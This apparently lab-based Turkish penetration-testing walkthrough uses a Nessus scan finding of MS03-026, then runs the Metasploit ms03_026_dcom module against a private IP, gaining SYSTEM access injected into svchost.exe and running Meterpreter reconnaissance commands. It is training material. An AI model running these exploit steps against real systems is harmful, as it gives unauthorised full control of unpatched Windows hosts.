Nessus ile zafiyet taraması sonucunda 192.168.244.138 IP adresli bilgisayarda MS03-026 zafiyetinin tespit edildiği görülmektedir.
Metasploit üzerinde ilgili modülün (MSF ms03_026_dcom istismar modülü) seçenekleri aşağıdaki gibidir:
search ms03-026
use exploit/windows/smb/ms03_026_dcom
show options
Seçenek olarak hedef IP adresinin ayarlanması yeterlidir. Böylece modül çalıştırılabilir.
set RHOST 192.168.244.138
show options
exploit
Modül çalıştırıldığında SYSTEM haklarıyla svchost.exe prosesine enjekte olunduğu görülmektedir.
sysinfo
getuid
getpid
ps